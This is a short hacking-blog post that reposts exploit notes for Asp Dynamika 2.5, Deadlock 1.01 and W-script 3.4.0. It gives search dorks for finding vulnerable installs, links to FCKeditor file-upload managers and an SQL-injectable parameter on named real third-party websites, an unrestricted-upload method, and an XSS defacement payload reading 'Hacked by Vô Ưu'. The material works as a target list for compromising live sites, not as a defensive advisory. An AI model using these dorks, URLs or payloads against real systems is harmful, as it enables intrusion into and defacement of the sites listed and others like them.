Share Dork FCKeditor Upload Vulnerability

Asp Dynamika 2.5 Upload Vulnerability
=====================================
Author : indoushka
Vondor : http://www.dynamika.co.il/dynamikadesign
Dork : Powered By : Dynamika
Tested on : windows 8.1 Français V.(Pro)
============================================================

FCKeditor Upload :

http://www.dynamika.co.il/dynamikadesign/FCKeditor/editor/filemanager/browser/default/browser.html?Type=Image&Connector=connectors/php/connector.php

SQl injection :

http://www.fassuta.muni.il/dynamika/Default.asp?id=3390&newsid=12151



| # Title : Deadlock 1.01 Stable Multi Vulnerability
| # Author : indoushka
| # email : indoushka4ever@gmail.com
| # Dork : Powered by Deadlock User Management System
| # Tested on: windows 8.1 Français V.(Pro)
| # Download : http://phpdeadlock.sourceforge.net/
=======================================

FckEditor Upload :

http://www.fisicamXedica.it/db_commissione_ricerca_reglogin/fckeditor/editor/fckeditor.html



0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-1
| # Title : W-script v3.4.0 unrestricted file upload Vulnerability
| # Author : indoushka
| # email : indoushka4ever@gmail.com
| # Dork : Powered by W-script v3.4.0
| # Tested on: windows 8.1 Français V.(Pro)
| # Download : http://www.wallpaperscript.net/
========================================================================

poc:

I- unrestricted file upload :

Register new user and upload any files and go to http://127.0.0.1/wscript/uploads/wallpapers/

II - ( XSS / HTML Inject ) :

in Search use Payload

<marquee><font color=lime size=32>Hacked by Vô Ưu</font></marquee>

Share on Google Plus

About Vo Uu

Tác Giả là người chuyên nghiên cứu về các kỹ thuật hacking, security, marketing, là người có góc nhìn lạ và đi sâu vấn đề cũng như là một con người thẳng thắn góp ý. Nếu sử dụng bài trên blog mong các bạn dẫn lại nguồn tác giả!!! Tác Giả rất mong có sự đóng góp hội ý từ cộng đồng để cho an toàn an ninh mạng việt nam ngày càng được an toàn hơn!!